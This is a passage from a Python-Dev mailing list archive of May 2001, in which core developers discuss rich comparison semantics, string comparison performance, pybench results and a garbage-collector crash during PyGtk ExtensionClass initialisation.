             UnicodePredicates:    1294.95 ms    5.76 us       n/a
             UnicodeProperties:    1410.45 ms    7.05 us       n/a
                UnicodeSlicing:    1296.80 ms    7.41 us       n/a
------------------------------------------------------------------------
            Average round time:   73388.00 ms                  n/a

*) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20)

(The compares not shown are below noise level (+-10%))

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one@home.com  Wed May 16 20:07:49 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 15:07:49 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com>

[Tim]
> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

[Guido]
> Unclear what you're asking.  The language doesn't require any
> particular semantics for sequence comparisons, but the language of
> course includes the tuple and list squence types, and it describes
> (albeing lacking some rigorous detail) what comparisons for those do.

The current

    Tuples and lists are compared lexicographically using comparison
    of corresponding items.

was quite clear in a cmp-only world.  In a richcmp world, "compared
lexicographically" is fuzzy enough that different implementations may do
different things in good faith, competent users may disagree about what it
means in specific cases, and programs may yield different results across
implementations (or random CVS patches <wink>).

> If there are specific lacks of detail, it probably helps to think
> about filling those in.

The *level* of additional detail intended is the cutoff between what's
guaranteed by the language and what's left up to the implementation.

The full truth before was relatively simple.  For a pair x, y of lists or
tuples,

def __cmp__(x, y):  # pretending this is a method on lists and tuples
    i = 0
    while i < len(x) and i < len(y):
        c = cmp(x[i], y[i])
        if c:
            return c
        i += 1
    return cmp(len(x), len(y))

was *almost* the entire tale, incl. that lengths were re-fetched on each
iteration.  What's left unexplained is the treatment of recursive lists, and
so the result of comparing them is a prime suspect for different behavior
across implementations and releases.

In a richcmp world, there are several additional ways in which the above
fails to capture the full truth, and each of those ways is another prime
suspect for surprises.

For example, I believe it's *intended* that:

1. Element comparisons continue to be strictly left-to-right, and
   that no element comparisons are to be performed after the leftmost
   element comparison that settles the issue (if any).

2. tuple/list comparison via == or != must use only == comparison on
   elements, and that implementations are allowed (but not required)
   to skip all element comparisons when == or != comparison is given
   lists/tuples of different sizes.

OTOH, I doubt (but don't know) it's intended that all implementations must
emulate other semantically significant details of the current implementation,
like:

1. <=, <, > and >= comparisons will do at most one element comparison
   that is not an == comparison.

2. Whenever a <, <=, > or >= element comparison is needed, the long-
   winded details of how that works, incl. but not limited to the
   specific "first try ==, then try <, then try >" strategy used to
   simulate a pre-richcmp cmp() when all else fails.

Going back to the original example:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> a, b = C(), C()
>>> a < b       #1
1
>>> [a] < [b]   #2
0
>>> cmp(a, b)   #3
0
>>> a > b       #4
1
>>> a == b      #5
1
>>> a != b      #6
1
>>>

Which of those results are *required* by the language, and which merely
*allowed*?

+ I believe #1, #4 and #5 are required.

+ I have no idea whether to call it "a bug" if the #2 and/or #3
  and/or #6 results differed, e.g., under Jython, or under
  CPython 2.3.  Indeed, I'm not even sure why #6 returns 1 under
  CPython today, and I've been staring at this a lot lately <wink>
  ... OK, #6 ends up getting resolved by comparing object
  addresses, which leaves "required or not?" fuzzy (i.e., *must*
  it be resolved that way?  or is it implementation-defined?).


From guido@digicool.com  Wed May 16 21:35:46 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 15:35:46 -0500
Subject: [Python-Dev] Rich comparison of lists and tuples
In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400."
 <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com>
Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>

[Subject fixed]

[Tim shows there's a lot left to the imagination when trying to glean
the meaning of list1==list2 using rich comparisons.]

I would like to break this down by defining the mapping between cmp()
and rich comparisons.

I propose:

- If cmp() is requested but not defined, and rich comparisons are
  defined, try ==, <, > in order; if all three yield false, act as if
  rich comparisons were not defined, and use the fallback comparison
  (i.e. by address).

- If a rich comparison is requested but not defined, use cmp() and use
  the obvious mapping.

- Continue to define the comparison of unequal sequences in terms of
  cmp().

- Testing == or != for sequences takes these shortcuts:

  1. if the lengths differ, the sequences differ

  2. compare the elements using == until a false return is found

Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
easily go the extra mile and define != to use only != on the items;
but is this worth the extra complexity?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Wed May 16 21:37:43 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Wed, 16 May 2001 15:37:43 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <20010516091942.A16455@glacier.fnational.com>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
 <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
 <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
 <15103.65486.61021.328424@beluga.mojam.com>
 <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
 <20010516091942.A16455@glacier.fnational.com>
Message-ID: <15106.58647.495143.164636@beluga.mojam.com>

    Neil> In other words the GC is finding a tuple object that contains an
    Neil> element with a funny looking address (data segment?) and an
    Neil> op_type of NULL. 

Neil,

I'm not sure if the funny looking address is a red herring or the key to the
crime.  I tried running with a breakpoint set in getBaseDictionary.  The
first couple times, the type parameter looked like

    $26 = (PyExtensionClass *) 0x80e7f60
    $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7138 "ExtensionClass", ...}

    $28 = (PyExtensionClass *) 0x80e8060
    $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7209 "Base", ...}

The third time it looked like

    $30 = (PyExtensionClass *) 0x4019f120
    $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x4019dab2 "GObject", ...}

The difference between the first two calls and the third one is that the
first two objects are defined in ExtensionClass.o, which I currently
statically link into the interpreter.  The Gtk/GObject stuff is dynamically
loaded into the running executable, so it's not surprising that it winds up
at a wildly different address than the ExtensionClass stuff.  My current
best guess is that whatever object the tuple is referring to is declared
static in the dynamically loaded Gtk stuff and has no business getting
reclaimed by the collector.  Sounds like a missing Py_INCREF somewhere.

At the earliest point I've been able to check that object so far, its
ob_type field is NULL.

Skip


From cpr@emsoftware.com  Wed May 16 23:24:15 2001
From: cpr@emsoftware.com (Chris Ryland)
Date: Wed, 16 May 2001 18:24:15 -0400
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2>

This talk is most entertaining! Highly recommended to you good folk, if only
as a reinforcement of the good design principles embodied in Python (with
the exception of print >> ;-).

Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he
wanted to give an example of a modern dynamic language (disclaiming a lot of
knowledge about it). He mentioned it three or four times (usually
positively), so it must be on the tip of his mind.
--
Cheers!
Chris Ryland
Em Software, Inc.
www.emsoftware.com


From greg@cosc.canterbury.ac.nz  Thu May 17 02:49:31 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 17 May 2001 13:49:31 +1200 (NZST)
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal@lemburg.com>:

> You forgot the most important one ;-) ...
>
>	"print 'My first Python program'".decode("python").run()

Surely that should be:

   "'My first Python program'.encode('stdout')".decode("python").decode("run")

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one@home.com  Thu May 17 02:56:56 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 21:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>

[Martin v. Loewis]
> I'll put a patch on SF soon which does what you want to do, i.e. tries
> tp_compare as the first thing if tp_richcompare is not there.

Thanks!  I'll check it out.

> Even with this patch, your code is faster if strings have a
> richcompare.

OK, from what I understand, that makes no sense.  Does it to you?  Assuming
you're still talking about my silly little

     "ab" < "cd"

test, then all the new code you put into your richcompare slot was a waste of
cycles for that specific case:  the new richcmp "objects the same type?" test
would fail, then the new "pointers equal?" test would fail, then the new "op
== Py_EQ?" test would fail, and then richcompare would give up and call
string_compare() anyway.  So I'm either missing something fundamental about
what you did, or it's a timing anomaly on your box that defies obvious
explanation ("but if I add three new tests that don't pay off, and make an
extra call, then it's faster!").

> Without richcompare, I get
>
> 0.720
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
>
> With it, I get
>
> 0.710
> 0.720
> 0.720
> 0.710
> 0.710
> 0.720
> 0.710
> 0.710
> 0.710
> 0.720

See above.

> Given that stock CVS python is in the 0.78 range, the different is
> neglectable, though.

Oh, I don't like giving up that easy on things that make no sense --
something else is happening here, although I've no idea what.


From tim.one@home.com  Thu May 17 03:17:37 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 22:17:37 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>

[MAL]
> Since it is possible that these figures result from my specific
> machine setup, I'd like to know what other people see on their
> machines.

Is this the same machine where you were able to get 15% difference a few
years ago by adding or removing an unreachable printf in ceval.c (or was that
Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
<wink>.

My Win98SE box is *astonishingly* useless for timings.  Without fail, the
first time I run pystone after a reboot yields a result a solid 50% higher
than the second or subsequent times I run it (yes, it's major-league *slower*
the second time).  This is true across dozens of trials over several months,
and across all versions of Python.

And simple little loops routinely vary in reported runtime by a factor of 3.
I may have to dig my old Win95 box out of the packing crate <0.6 wink>.

None of that changes, of course, that the numbers you got are scary.


From jeremy@digicool.com  Wed May 16 23:37:47 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Wed, 16 May 2001 18:37:47 -0400 (EDT)
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
References: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <15107.315.19349.268345@slothrop.digicool.com>

As usual, the results you're reporting are quite different than what I
see on my machine.  I'd like to think that my machine is more normal
than yours, but I expect we're both oddballs <0.2 wink>.  I see
basically the same slowdowns that you see, but the amount of the
slowdown is quite a bit smaller.

I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and
the -O3 flag; ran pybench of an 800MHz P3 with 256MB RAM running Linux
2.2.17.

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 0.85
This machine benchmarks at 11764.7 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 0.94
This machine benchmarks at 10638.3 pystones/second

PYBENCH 0.9

Benchmark: cvs (rounds=10, warp=100)

Tests:                              per run    per oper.  diff *
------------------------------------------------------------------------
          BuiltinFunctionCalls:      41.85 ms    1.64 us  +31.40%
                 CompareFloats:      39.60 ms    0.44 us  +13.96%
         CompareFloatsIntegers:
               CompareIntegers:
                  CompareLongs:      39.85 ms    0.44 us  +15.01%
                CompareStrings:
                CompareUnicode:
                 ConcatStrings:      48.65 ms    1.62 us  +46.76%
                 ConcatUnicode:
               CreateInstances:      75.75 ms    9.02 us  +55.54%
       CreateStringsWithConcat:      51.60 ms    1.29 us  +62.78%
       CreateUnicodeWithConcat:
                  DictCreation:      87.80 ms    2.93 us  +115.72%
             DictWithFloatKeys:
           DictWithIntegerKeys:
            DictWithStringKeys:
                      ForLoops:      63.85 ms   31.93 us  -13.60%
                    IfThenElse:
                   ListSlicing:
                NestedForLoops:      32.95 ms    0.66 us  +10.39%
          NormalClassAttribute:
       NormalInstanceAttribute:
           PythonFunctionCalls:      48.85 ms    1.48 us  +11.78%
             PythonMethodCalls:      38.95 ms    2.60 us  +12.09%
                     Recursion:
                  SecondImport:      37.80 ms    7.56 us  +65.79%
           SecondPackageImport:      38.95 ms    7.79 us  +50.68%
         SecondSubmoduleImport:      49.90 ms    9.98 us  +35.05%
       SimpleComplexArithmetic:      58.95 ms    1.34 us  +74.67%
        SimpleDictManipulation:
         SimpleFloatArithmetic:
      SimpleIntFloatArithmetic:
       SimpleIntegerArithmetic:
        SimpleListManipulation:      43.65 ms    0.81 us  +15.63%
          SimpleLongArithmetic:      42.70 ms    1.29 us  +53.32%
                    SmallLists:      79.15 ms    1.55 us  +56.89%
                   SmallTuples:      66.65 ms    1.39 us  +43.03%
         SpecialClassAttribute:
      SpecialInstanceAttribute:
                StringMappings:
              StringPredicates:
                 StringSlicing:      39.00 ms    1.11 us  +28.71%
                     TryExcept:
                TryRaiseExcept:      50.60 ms   16.87 us  +27.46%
                  TupleSlicing:      37.90 ms    1.80 us  +26.54%
               UnicodeMappings:
             UnicodePredicates:
             UnicodeProperties:
                UnicodeSlicing:
------------------------------------------------------------------------
            Average round time:    3177.00 ms                n/a

*) measured against: 1.5.2 (rounds=10, warp=100)

(As MAL did, I removed all the results were the difference is +/-
10%.)

i-never-do-simple-complex-arithmetic-anyway-ly yr's,
Jeremy


From martin@loewis.home.cs.tu-berlin.de  Thu May 17 07:12:18 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:12:18 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>

> OK, from what I understand, that makes no sense.  Does it to you?

After reviewing everything again, I think I now do: In the richcomp
case, I have

			res = (*f1)(v, w, op);
			if (res != Py_NotImplemented)
				return res;

f1 is string_richcompare, so I get 2 function calls inside do_richcmp:
one to string_richcompare, the other one to string_compare, as my
optimizations are not triggered in your example.

If I set tp_richcompare of strings to 0, I get past this code, and do

		c = (*f)(v, w);
		if (PyErr_Occurred())
			return NULL;
		return convert_3way_to_object(op, c);

Here, I get 3 function calls: f is string_compare, then
PyErr_Occurred, finally convert_3way_to_object, which converts
{-1,0,1} x Op -> {Py_True, Py_False}.

Indeed, when I inline convert_3way_to_object, I get the same speed in
both cases (with the remaining differences attributed to measurement
and gcc doing register usage differently in both functions).

I'd still be in favour of giving strings a richcompare, since it
allows to optimize what I think is the single most frequent case:
Py_EQ on strings. With a control flow like

		if (a->ob_size != b->ob_size) 
                   goto False;

		if (a->ob_size == 0) 
                   goto True;

		if (a->ob_sval[0] != b->ob_sval[0])
                   goto False;

		if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
                   goto False;
                else
                   goto True;

we can reduce the number of function calls 

Regards,
Martin


From skip@pobox.com (Skip Montanaro)  Thu May 17 07:42:41 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 17 May 2001 01:42:41 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
Message-ID: <15107.29409.242342.200378@beluga.mojam.com>

Over the past couple days I've included python-dev on various messages in an
ongoing thread about a segmentation violation I was getting with the new
PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
Schemenauer, I finally know what's going on and I have a simple workaround
that lets me get back to work.  Here's a summary of the problem.

When defining ExtensionClass types, you need to create and initialize a
PyExtensionClass struct.  It looks something like so:

    PyExtensionClass PyGtkTreeSortable_Type = {
	PyObject_HEAD_INIT(NULL)
	0,				/* ob_size */
	"GtkTreeSortable",			/* tp_name */
	sizeof(PyPureMixinObject),	/* tp_basicsize */
	...
    };

Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
normally be the address of a type object (e.g. &PyType_Type).  However, Jim
Fulton pointed out that on Windows you can't get the address of &PyType_Type
object at compile time.  Accordingly, ExtensionClass provides a
PyExtensionClass_Export macro whose responsibility is, in part, to set the
ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
will know why.  I just accept Jim's word as gospel and move on...)

A problem arises if the garbage collector runs while the module
initialization function is running, but before all the ob_type fields have
been assigned their correct values.  In this case, a one-element tuple
representing the bases of a particular PyGtk extension class was traversed
by the garbage collector.

The workaround turns out to be exceedingly simple:

    import gc
    gc.disable()
    import gtk
    gc.enable()

I can handle doing that from Python code for the time being and will leave
it up to others to decide how, if at all, ExtensionClass should be changed
to correct the problem.

Skip


From martin@loewis.home.cs.tu-berlin.de  Thu May 17 07:41:15 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:41:15 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>

> 1. String objects are also equal despite being different objects,
>    if their ob_sinterned pointers are equal and non-NULL.  So if
>    you're looking for every trick in & out of the book, that's
>    another one.

That does not help. In the entire test suite, there are 0 instances
where strings are compared which are not identical, but have equal
ob_sinterned pointers.

> > So 5% of the calls are with identical strings, for which I can
> > immediately decide the outcome.
>
> But also at the cost of doing a fruitless compare and branch in 95%
> of calls.

Whether there's a fruitless branch depends on your compiler. With gcc
3, you can write

	if (__builtin_expect(a == b, 0)) {

and then the body of the if block will be moved out of the way of
linear control flow.

> Any idea where those 800,000 virgin calls to oldcomp are coming
> from?  That's a lot.

As far as I could trace it, most of them come from lookdict_string (at
various locations inside this function).

> > #comps:                        2949421
> > #memcmps:                       917776
> >
> > So still, ca. 30% can be decided by first byte.
> 
> Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
> 2949421, in which case I would have expected you to say that 70% can be
> decided by first byte.

Oops, you are right.

> It's clearer that this is going to hurt sorting (& bisect etc), by
> adding yet another layer of function call to get Py_LT resolved (as
> for dict compares too, the string richcmp can't do anything to speed
> up Py_LT that string oldcmp can't do just as efficiently -- indeed,
> that's the great advantage oldcmp's "compare first character" test
> had: that *can* decide Py_LT in one byte much of the time (but
> length comparison cannot)).

So to support sorting better, I should special-case Py_LT in
string_richcompare also, to avoid the function call ?-)

> Note too earlier mail about how adding a richcmp slot to strings will
> suddenly slow cmp(string1, string2) (which is the usual way to program a
> search tree, because cmp() *used* to call a string comparison routine only
> once; but after adding a richcmp slot, each cmp(string1, string2) will call
> the richcmp slot from 1 thru 3 times (data-dependent)).

Yes, that is a serious problem. Fortunately, very few calls in my
programs go to string_compare through cmp() now. But then, your
programs are different, of course...

Regards,
Martin


From mal@lemburg.com  Thu May 17 07:54:37 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 08:54:37 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B0375AD.24E039B0@lemburg.com>

skip@pobox.com wrote:
> 
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
> 
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>         PyObject_HEAD_INIT(NULL)
>         0,                              /* ob_size */
>         "GtkTreeSortable",                      /* tp_name */
>         sizeof(PyPureMixinObject),      /* tp_basicsize */
>         ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)
> 
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.

I wonder how the GC collector could "see" the type object before
it has been initialized... since PyGtkTreeSortable_Type is a static
C array and not a known PyObject until you add it to some Python
dictionary as type object or use it for creating instances, it
seems strange that the GC collector can reach out for it and
get hit by the fact that it is not yet properly initialized.

Some logic in PyExtensionClass_Export() or the GTK module must
be twisted.
 
> The workaround turns out to be exceedingly simple:
> 
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
> 
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@effbot.org  Thu May 17 08:00:20 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Thu, 17 May 2001 09:00:20 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>

Skip wrote:
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>        PyObject_HEAD_INIT(NULL)
>        0, /* ob_size */
>        "GtkTreeSortable", /* tp_name */
>        sizeof(PyPureMixinObject), /* tp_basicsize */
>        ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time. Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime

footnote: this is usually done in the module init function, *before*
the call to Py_InitModule.  see:

    http://www.python.org/doc/FAQ.html#3.24

if the garbage collector can run after Python calls a module's init-
function, but before that module calls back into Python, anything
can happen...

Cheers /F


From skip@pobox.com (Skip Montanaro)  Thu May 17 08:04:06 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 17 May 2001 02:04:06 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a
 workaround
In-Reply-To: <3B0375AD.24E039B0@lemburg.com>
References: <15107.29409.242342.200378@beluga.mojam.com>
 <3B0375AD.24E039B0@lemburg.com>
Message-ID: <15107.30694.131193.989215@beluga.mojam.com>

    mal> I wonder how the GC collector could "see" the type object before it
    mal> has been initialized... since PyGtkTreeSortable_Type is a static C
    mal> array and not a known PyObject until you add it to some Python
    mal> dictionary as type object or use it for creating instances, it
    mal> seems strange that the GC collector can reach out for it and get
    mal> hit by the fact that it is not yet properly initialized.

It is actually PyGtkWidget_Type that is not yet initialized when it is
placed in the bases tuple for one of its subclasses.  GC traverses that
tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
whose ob_type field has not yet been initialized.  The actual object whose
bases tuple is being traversed is (in all the crashes I encountered),
GdkDragContext.  The ordering of the registration calls could perhaps be
reordered.  Currently GdkDragContext is patched up before GtkWidget, its
base class.  This code is generated by James Henstridge's wrapper code
generator, so perhaps he can maintain the necessary class hierarchy
relationships and insure that base classes are initialized before their
subclasses.

Skip


From skip@pobox.com (Skip Montanaro)  Thu May 17 08:07:15 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 17 May 2001 02:07:15 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
References: <15107.29409.242342.200378@beluga.mojam.com>
 <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <15107.30883.680397.280556@beluga.mojam.com>

    Fredrik> footnote: this is usually done in the module init function,
    Fredrik> *before* the call to Py_InitModule.  see:

    Fredrik>     http://www.python.org/doc/FAQ.html#3.24

    Fredrik> if the garbage collector can run after Python calls a module's
    Fredrik> init- function, but before that module calls back into Python,
    Fredrik> anything can happen...

Thanks for pointing that out.  Py_InitModule is indeed called before the
fixup occurs.

Skip


From mal@lemburg.com  Thu May 17 08:09:38 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:09:38 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
 <3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com>
Message-ID: <3B037932.476F475A@lemburg.com>

skip@pobox.com wrote:
> 
>     mal> I wonder how the GC collector could "see" the type object before it
>     mal> has been initialized... since PyGtkTreeSortable_Type is a static C
>     mal> array and not a known PyObject until you add it to some Python
>     mal> dictionary as type object or use it for creating instances, it
>     mal> seems strange that the GC collector can reach out for it and get
>     mal> hit by the fact that it is not yet properly initialized.
> 
> It is actually PyGtkWidget_Type that is not yet initialized when it is
> placed in the bases tuple for one of its subclasses.  GC traverses that
> tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
> whose ob_type field has not yet been initialized.  The actual object whose
> bases tuple is being traversed is (in all the crashes I encountered),
> GdkDragContext.  The ordering of the registration calls could perhaps be
> reordered.  Currently GdkDragContext is patched up before GtkWidget, its
> base class.  This code is generated by James Henstridge's wrapper code
> generator, so perhaps he can maintain the necessary class hierarchy
> relationships and insure that base classes are initialized before their
> subclasses.

Wouldn't it be easier to simply set the ob_type fields right at the
start of the initGtk() function ? This is what I do for all
my extensions and I've never seen any problems with it.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james@daa.com.au  Thu May 17 08:18:23 2001
From: james@daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:18:23 +0800 (WST)
Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <Pine.LNX.4.33.0105171515140.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001 skip@pobox.com wrote:

>
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
>
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
>
>     PyExtensionClass PyGtkTreeSortable_Type = {
> 	PyObject_HEAD_INIT(NULL)
> 	0,				/* ob_size */
> 	"GtkTreeSortable",			/* tp_name */
> 	sizeof(PyPureMixinObject),	/* tp_basicsize */
> 	...
>     };
>
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)

Well, for Extension Classes, PyType_Type is not correct either.  And
because ExtensionClass is loaded at runtime, we can't set the ob_type
field in the initialiser even on Unix systems.

>
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.
>
> The workaround turns out to be exceedingly simple:
>
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
>
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

Thanks for debugging this problem Skip.  If we don't find a correct
solution to the problem, I can put the gc disable/enable calls inside the
gtk/__init__.py module.

James.


From mal@lemburg.com  Thu May 17 08:26:32 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:26:32 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>
Message-ID: <3B037D27.E258C363@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Since it is possible that these figures result from my specific
> > machine setup, I'd like to know what other people see on their
> > machines.
> 
> Is this the same machine where you were able to get 15% difference a few
> years ago by adding or removing an unreachable printf in ceval.c (or was that
> Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
> <wink>.

That must have been Valdimir's machine... even though I do admit
that some small reordering changes do result in speedups of
up to 10% -- probably due to the compiler accidentally creating
code which the CPUs cache management likes.
 
> My Win98SE box is *astonishingly* useless for timings.  Without fail, the
> first time I run pystone after a reboot yields a result a solid 50% higher
> than the second or subsequent times I run it (yes, it's major-league *slower*
